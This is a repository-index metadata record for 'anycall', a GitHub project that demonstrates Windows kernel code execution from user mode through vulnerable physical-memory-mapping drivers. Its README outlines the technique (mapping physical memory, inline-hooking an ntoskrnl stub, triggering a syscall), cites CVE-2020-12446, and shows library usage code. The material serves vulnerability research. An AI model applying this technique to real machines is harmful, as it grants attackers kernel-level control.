{"id":16551767,"url":"https://github.com/kkent030315/anycall","last_synced_at":"2025-04-09T13:03:48.468Z","repository":{"id":52678709,"uuid":"367226901","full_name":"kkent030315/anycall","owner":"kkent030315","description":"x64 Windows kernel code execution via user-mode, arbitrary syscall, vulnerable IOCTLs demonstration","archived":false,"fork":false,"pushed_at":"2022-07-06T17:17:52.000Z","size":894,"stargazers_count":311,"open_issues_count":3,"forks_count":65,"subscribers_count":7,"default_branch":"main","last_synced_at":"2025-04-02T10:13:42.954Z","etag":null,"topics":["cli","code-execution","device-driver","driver","drivers","kernel","kernel-exploit","kernel-exploitation","kernel-exploits","memory-hacking","smep","smep-bypass","windows","windows-10"],"latest_commit_sha":null,"homepage":"https://www.godeye.club/2021/05/14/001-x64-windows-kernel-code-execution-via-user.html","language":"C++","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/kkent030315.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2021-05-14T02:22:54.000Z","updated_at":"2025-04-01T22:23:02.000Z","dependencies_parsed_at":"2022-08-13T02:01:20.401Z","dependency_job_id":null,"html_url":"https://github.com/kkent030315/anycall","commit_stats":null,"previous_names":[],"tags_count":2,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/kkent030315%2Fanycall","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/kkent030315%2Fanycall/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/kkent030315%2Fanycall/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/kkent030315%2Fanycall/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/kkent030315","download_url":"https://codeload.github.com/kkent030315/anycall/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":248045230,"owners_count":21038553,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cli","code-execution","device-driver","driver","drivers","kernel","kernel-exploit","kernel-exploitation","kernel-exploits","memory-hacking","smep","smep-bypass","windows","windows-10"],"created_at":"2024-10-11T19:43:06.745Z","updated_at":"2025-04-09T13:03:48.447Z","avatar_url":"https://github.com/kkent030315.png","language":"C++","funding_links":[],"categories":[],"sub_categories":[],"readme":"\u003cp align=\"center\"\u003e\n\u003cimg src=\"image.png\"\u003e\n\n\u003cimg src=\"https://img.shields.io/github/workflow/status/kkent030315/anycall/MSBuild?style=for-the-badge\"\u003e\n\u003cimg src=\"https://img.shields.io/github/v/release/kkent030315/anycall?style=for-the-badge\"\u003e\n\u003cimg src=\"https://img.shields.io/badge/platform-win--64-00a2ed?style=for-the-badge\"\u003e\n\u003cimg src=\"https://img.shields.io/codacy/grade/80af226b06214213bc3d2a44c9624222?style=for-the-badge\"\u003e\n\u003cimg src=\"https://img.shields.io/github/license/kkent030315/anycall?style=for-the-badge\"\u003e\n\u003c/p\u003e\n\n# anycall\n\nx64 Windows kernel code execution via user-mode, arbitrary syscall, vulnerable IOCTLs demonstration\n\nRead: https://www.godeye.club/2021/05/14/001-x64-windows-kernel-code-execution-via-user.html\n\n## How it works\n\n\u003cp align=\"center\"\u003e\n\u003cimg src=\"how.png\"\u003e\n\u003c/p\u003e\n\n1. Map physical memory into the user process's virtual memory\n\t- Lets the user process manipulate arbitrary physical memory without calling any API\n2. Search the entire physical memory for the `ntoskrnl.exe` function stub to hook\n3. Once the stub is found, place an inline hook on it\n\t- simply `jmp rax`; the detour address can be any function we want to invoke\n4. `syscall` it\n5. wow, we are in `user-mode` but able to call kernel APIs\n\n## Goal of this project\n\nThis project demonstrates how drivers that allow a user process to map physical memory work, and how critically vulnerable that design is.\n\nRelated CVEs:\n\n- [CVE-2020-12446](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12446)\n\n## libanycall\n\n`libanycall` is a powerful C++ static library that makes running the `anycall` exploit easier.\n\n### Usage\n\n1. link it (e.g., `#pragma comment( lib, \"libanycall64\" )`)\n2. include it (e.g., `#include \"libanycall.h\"`)\n\nFor example:\n\n```cpp\n#include \u003cwindows.h\u003e\n#include \u003ccstdint\u003e\n#include \u003ccstdio\u003e\n#include \u003ciostream\u003e\n\n#include \"libanycall.h\"\n\n#pragma comment( lib, \"libanycall64\" )\n\n// signature of the kernel export we are going to call\nusing PsGetCurrentProcessId = HANDLE( __fastcall* )( void );\n\nint main( const int argc, const char** argv, const char** envp )\n{\n    // locate and hook the syscall stub via the given ntdll export\n    if ( !libanycall::init( \"ntdll.dll\", \"NtTraceControl\" ) )\n    {\n        printf( \"[!] failed to init libanycall\\n\" );\n        return EXIT_FAILURE;\n    }\n    \n    // invoke NT kernel APIs from usermode\n    const uint32_t process_id =\n        ( uint32_t )ANYCALL_INVOKE( PsGetCurrentProcessId );\n\n    printf( \"PsGetCurrentProcessId returns %u\\n\", process_id );\n\n    return EXIT_SUCCESS;\n}\n```\n\n## License\n\nMIT\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fkkent030315%2Fanycall","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fkkent030315%2Fanycall","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fkkent030315%2Fanycall/lists"}